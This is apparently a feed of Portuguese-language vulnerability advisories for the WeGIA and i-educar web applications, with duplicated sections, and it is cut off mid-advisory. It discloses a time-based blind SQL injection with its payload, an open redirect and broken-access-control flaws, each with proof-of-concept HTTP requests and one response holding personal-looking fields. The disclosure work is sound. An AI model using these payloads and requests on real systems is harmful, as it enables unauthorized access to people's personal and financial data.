id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 02 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-61605/ https://www.cvehunters.com/pt/p/cve-2025-61605/ <h2 id="cve-2025-61605-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-descricao-do-endpoint-controlecontrolphp">CVE-2025-61605: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>descricao</code> do Endpoint <code>/controle/control.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-61605" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-61605</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>descricao</code> do endpoint <code>/controle/control.php</code>. Esse problema permite que qualquer invasor injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>descricao</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-61605-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-descricao-do-endpoint-controlecontrolphp">CVE-2025-61605: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>descricao</code> do Endpoint <code>/controle/control.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-61605" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-61605</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>descricao</code> do endpoint <code>/controle/control.php</code>. Esse problema permite que qualquer invasor injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>descricao</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>/controle/control.php</code></p> <p>Parâmetro: <code>descricao</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">'%20AND%20SLEEP(5)%20AND%20'1'%3D'1'--%20- </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-61605/image.png" width="1530" height="710" srcset="/p/cve-2025-61605/image_hu_14dc839ca21520de.png 480w, /p/cve-2025-61605/image_hu_b816c8af74ba98e7.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="215" data-flex-basis="517px" /></p> <p style="text-align: justify;">Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-v8hm-pq8g-c7j4" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-v8hm-pq8g-c7j4</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 02 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-61606/ https://www.cvehunters.com/pt/p/cve-2025-61606/ <h2 id="cve-2025-61606-vulnerabilidade-de-open-redirect-no-parâmetro-nextpage-do-endpoint-controlphp">CVE-2025-61606: Vulnerabilidade de Open Redirect no parâmetro <code>nextPage</code> do endpoint <code>control.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-61606" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-61606</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Open Redirect foi identificada no endpoint <code>control.php</code> do aplicativo WeGIA, especificamente no parâmetro <code>nextPage</code> (metodo=listarUm nomeClasse=FuncionarioControle).</br></br>Essa vulnerabilidade permite que invasores redirecionem usuários para domínios externos arbitrários, possibilitando campanhas de phishing, distribuição de payload malicioso ou roubo de credenciais de usuários.</p> <h2 id="detalhes">Detalhes </h2><p>«p style=“text-align: justify;">O aplicativo falha ao validar e sanitizar a entrada do usuário no parâmetro <code>nextPage</code>.</br></br>Como resultado, invasores podem criar URLs maliciosas que redirecionam os usuários para sites externos fora do domínio confiável, minando a confiança do usuário e possibilitando ataques de engenharia social.</p><h2 id="cve-2025-61606-vulnerabilidade-de-open-redirect-no-parâmetro-nextpage-do-endpoint-controlphp">CVE-2025-61606: Vulnerabilidade de Open Redirect no parâmetro <code>nextPage</code> do endpoint <code>control.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-61606" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-61606</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Open Redirect foi identificada no endpoint <code>control.php</code> do aplicativo WeGIA, especificamente no parâmetro <code>nextPage</code> (metodo=listarUm nomeClasse=FuncionarioControle).</br></br>Essa vulnerabilidade permite que invasores redirecionem usuários para domínios externos arbitrários, possibilitando campanhas de phishing, distribuição de payload malicioso ou roubo de credenciais de usuários.</p> <h2 id="detalhes">Detalhes </h2><p>«p style=“text-align: justify;">O aplicativo falha ao validar e sanitizar a entrada do usuário no parâmetro <code>nextPage</code>.</br></br>Como resultado, invasores podem criar URLs maliciosas que redirecionam os usuários para sites externos fora do domínio confiável, minando a confiança do usuário e possibilitando ataques de engenharia social.</p></p> <p>Endpoint vulnerável: <code>GET metodo=listarUm&nomeClasse=FuncionarioControle&nextPage=https%3A%2F%2Fgoogle.com&id_funcionario=2</code></p> <p>Parâmetro: <code>nextPage</code></p> <h3 id="poc">PoC </h3><h4 id="request">Request: </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /WeGIA/controle/control.php?metodo=listarUm&nomeClasse=FuncionarioControle&nextPage=https%3A%2F%2Fgoogle.com&id_funcionario=2 HTTP/1.1 </span></span><span class="line"><span class="cl">Host: sec.wegia.org:8000 </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Referer: https://sec.wegia.org:8000/WeGIA/html/funcionario/informacao_funcionario.php </span></span><span class="line"><span class="cl">Cookie: {COOKIE} </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">O servidor aceita a solicitação elaborada e redireciona com sucesso a vítima para <code>https://google.com</code> em vez de restringir a navegação ao domínio do próprio aplicativo.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Phishing: Invasores podem induzir usuários a visitar sites maliciosos que imitam sites legítimos.</li> <li>Roubo de credenciais: Páginas de login falsas podem capturar credenciais de usuários.</li> <li>Distribuição de malware: As vítimas podem ser redirecionadas para sites que hospedam software malicioso.</li> <li>Danos à reputação: Os usuários podem perder a confiança na plataforma Wegia se forem vítimas de abuso em campanhas de phishing.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-m64v-hm7q-33wr" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-m64v-hm7q-33wr</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 02 Oct 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-61665/ https://www.cvehunters.com/pt/p/cve-2025-61665/ <h2 id="cve-2025-61665-controle-de-acesso-quebrado-no-endpoint-get_relatorios_sociosphp">CVE-2025-61665: Controle de Acesso Quebrado no Endpoint <code>get_relatorios_socios.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-61665" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-61665</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Foi identificada uma vulnerabilidade de Controle de Acesso Quebrado no endpoint <code>get_relatorios_socios.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que atacantes não autenticados acessem diretamente informações pessoais e financeiras sensíveis dos membros sem exigir autenticação ou autorização.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint vulnerável: <code>get_relatorios_socios.php</code></p> <p>Parâmetros: <code>tipo_socio</code>, <code>tipo_pessoa</code>, <code>operador</code>, <code>valor</code>, <code>tag</code>, <code>status</code></p> <h2 id="poc">PoC </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /WeGIA/html/socio/sistema/get_relatorios_socios.php?tipo_socio=x&tipo_pessoa=x&operador=maior_q&valor=&tag=x&status=x HTTP/1.1 </span></span><span class="line"><span class="cl">Host: sec.wegia.org:8000 </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: */* </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: https://sec.wegia.org:8000/WeGIA/html/socio/sistema/relatorios_socios.php </span></span><span class="line"><span class="cl">Cookie: _ga_F8DXBXLV8J=GS2.1.s1756605228$o47$g1$t1756611307$j47$l0$h0; _ga=GA1.1.424189364.1749063834 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Priority: u=0 </span></span></code></pre></td></tr></table> </div> </div><h3 id="response-snippet">Response (snippet): </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">HTTP/1.1 200 OK </span></span><span class="line"><span class="cl">Date: Sun, 31 Aug 2025 20:00:43 GMT </span></span><span class="line"><span class="cl">Server: Apache/2.4.62 (Debian) </span></span><span class="line"><span class="cl">Vary: Accept-Encoding </span></span><span class="line"><span class="cl">Content-Length: 204 </span></span><span class="line"><span class="cl">Keep-Alive: timeout=5, max=100 </span></span><span class="line"><span class="cl">Connection: Keep-Alive </span></span><span class="line"><span class="cl">Content-Type: text/html; charset=UTF-8 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">[{ </span></span><span class="line"><span class="cl"> "nome": "Luis Barango", </span></span><span class="line"><span class="cl"> "telefone": "(71)98642-1278", </span></span><span class="line"><span class="cl"> "cpf": "649.659.320-56", </span></span><span class="line"><span class="cl"> "valor_periodo": "5000.00", </span></span><span class="line"><span class="cl"> "email": "teste@teste.com", </span></span><span class="line"><span class="cl"> "tipo": "F\u00edsica - Mensal - Boleto", </span></span><span class="line"><span class="cl"> "status": "Ativo", </span></span><span class="line"><span class="cl"> "tag": "Solicitante" </span></span><span class="line"><span class="cl">}] </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-61665/image.png" width="1534" height="431" srcset="/p/cve-2025-61665/image_hu_14ad2691788bd7c6.png 480w, /p/cve-2025-61665/image_hu_16f20d6fda007cbd.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="355" data-flex-basis="854px" ></p><h2 id="cve-2025-61665-controle-de-acesso-quebrado-no-endpoint-get_relatorios_sociosphp">CVE-2025-61665: Controle de Acesso Quebrado no Endpoint <code>get_relatorios_socios.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-61665" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-61665</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Foi identificada uma vulnerabilidade de Controle de Acesso Quebrado no endpoint <code>get_relatorios_socios.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que atacantes não autenticados acessem diretamente informações pessoais e financeiras sensíveis dos membros sem exigir autenticação ou autorização.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint vulnerável: <code>get_relatorios_socios.php</code></p> <p>Parâmetros: <code>tipo_socio</code>, <code>tipo_pessoa</code>, <code>operador</code>, <code>valor</code>, <code>tag</code>, <code>status</code></p> <h2 id="poc">PoC </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /WeGIA/html/socio/sistema/get_relatorios_socios.php?tipo_socio=x&tipo_pessoa=x&operador=maior_q&valor=&tag=x&status=x HTTP/1.1 </span></span><span class="line"><span class="cl">Host: sec.wegia.org:8000 </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: */* </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: https://sec.wegia.org:8000/WeGIA/html/socio/sistema/relatorios_socios.php </span></span><span class="line"><span class="cl">Cookie: _ga_F8DXBXLV8J=GS2.1.s1756605228$o47$g1$t1756611307$j47$l0$h0; _ga=GA1.1.424189364.1749063834 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Priority: u=0 </span></span></code></pre></td></tr></table> </div> </div><h3 id="response-snippet">Response (snippet): </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">HTTP/1.1 200 OK </span></span><span class="line"><span class="cl">Date: Sun, 31 Aug 2025 20:00:43 GMT </span></span><span class="line"><span class="cl">Server: Apache/2.4.62 (Debian) </span></span><span class="line"><span class="cl">Vary: Accept-Encoding </span></span><span class="line"><span class="cl">Content-Length: 204 </span></span><span class="line"><span class="cl">Keep-Alive: timeout=5, max=100 </span></span><span class="line"><span class="cl">Connection: Keep-Alive </span></span><span class="line"><span class="cl">Content-Type: text/html; charset=UTF-8 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">[{ </span></span><span class="line"><span class="cl"> "nome": "Luis Barango", </span></span><span class="line"><span class="cl"> "telefone": "(71)98642-1278", </span></span><span class="line"><span class="cl"> "cpf": "649.659.320-56", </span></span><span class="line"><span class="cl"> "valor_periodo": "5000.00", </span></span><span class="line"><span class="cl"> "email": "teste@teste.com", </span></span><span class="line"><span class="cl"> "tipo": "F\u00edsica - Mensal - Boleto", </span></span><span class="line"><span class="cl"> "status": "Ativo", </span></span><span class="line"><span class="cl"> "tag": "Solicitante" </span></span><span class="line"><span class="cl">}] </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-61665/image.png" width="1534" height="431" srcset="/p/cve-2025-61665/image_hu_14ad2691788bd7c6.png 480w, /p/cve-2025-61665/image_hu_16f20d6fda007cbd.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="355" data-flex-basis="854px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;">Broken Access Control vulnerabilities can have severe consequences, including: <ul> <li>Unauthorized access to restricted functionality;</li> <li>Escalation of privileges for low-level users;</li> <li>Exposure of sensitive data and potential system compromise;</li> <li>Loss of confidentiality and integrity of educational records;</li> <li>Reputational damage to the organization.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-62wp-6qmh-6p5f" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-62wp-6qmh-6p5f</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 30 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-11049/ https://www.cvehunters.com/pt/p/cve-2025-11049/ <h2 id="cve-2025-11049-controle-de-acesso-quebrado-no-endpoint-unificacao-aluno">CVE-2025-11049: Controle de Acesso Quebrado no Endpoint <code>/unificacao-aluno</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-11049" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-11049</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint <code>/unificacao-aluno</code> do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"><b>Endpoint Vulnerável:</b> <code>GET /unificacao-aluno</code></br><b>Autenticação:</b> Obrigatória</br></br>O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .</p><h2 id="cve-2025-11049-controle-de-acesso-quebrado-no-endpoint-unificacao-aluno">CVE-2025-11049: Controle de Acesso Quebrado no Endpoint <code>/unificacao-aluno</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-11049" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-11049</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint <code>/unificacao-aluno</code> do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;"><b>Endpoint Vulnerável:</b> <code>GET /unificacao-aluno</code></br><b>Autenticação:</b> Obrigatória</br></br>O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .</p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Autenticar como um usuário sem privilégios.</li></ul></p> <p><img src="/p/cve-2025-11049/image.png" width="1603" height="673" srcset="/p/cve-2025-11049/image_hu_d7804f71d4cae366.png 480w, /p/cve-2025-11049/image_hu_7e1e16197ca84d77.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="238" data-flex-basis="571px" /></p> <p><img src="/p/cve-2025-11049/image-1.png" width="936" height="436" srcset="/p/cve-2025-11049/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-11049/image-1_hu_f205df0666d7bd3a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="214" data-flex-basis="515px" /></p> <p style="text-align: justify;"><ul><li>Enviar a seguinte requisição:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">GET /unificacao-aluno HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/intranet/educar_consulta_movimento_mensal_lst.php?ano=2025<span class="err">&</span>ref_cod_instituicao=1<span class="err">&</span>ref_cod_escola=4<span class="err">&</span>ref_cod_curso=3<span class="err">&</span>ref_cod_serie=<span class="err">&</span>ref_cod_turma=<span class="err">&</span>data_inicial=01%2F08%2F2025<span class="err">&</span>data_final=31%2F08%2F2025<span class="err">&</span>modalidade=1 </span></span><span class="line"><span class="cl">Cookie: i_educar_session=[low_privileged cookie] </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"><ul><li>Podemos observar que temos acesso à página e à função. E esse usuário não deve fazer isso.</li></ul></p> <p><img src="/p/cve-2025-11049/image-2.png" width="1585" height="666" srcset="/p/cve-2025-11049/image-2_hu_65700f12f8b3e361.png 480w, /p/cve-2025-11049/image-2_hu_385fd793852dde6.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="237" data-flex-basis="571px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo: <ul> <li>Acesso não autorizado a funcionalidades restritas;</li> <li>Escalonamento de privilégios para usuários de baixo nível;</li> <li>Exposição de dados sensíveis e potencial comprometimento do sistema;</li> <li>Perda de confidencialidade e integridade de registros educacionais;</li> <li>Danos à reputação da organização.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11049.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11049.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>Por: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sat, 27 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-11050/ https://www.cvehunters.com/pt/p/cve-2025-11050/ <h2 id="cve-2025-11050-controle-de-acesso-quebrado-no-endpoint-periodo-lancamento">CVE-2025-11050: Controle de Acesso Quebrado no Endpoint <code>/periodo-lancamento</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-11050" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-11050</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de 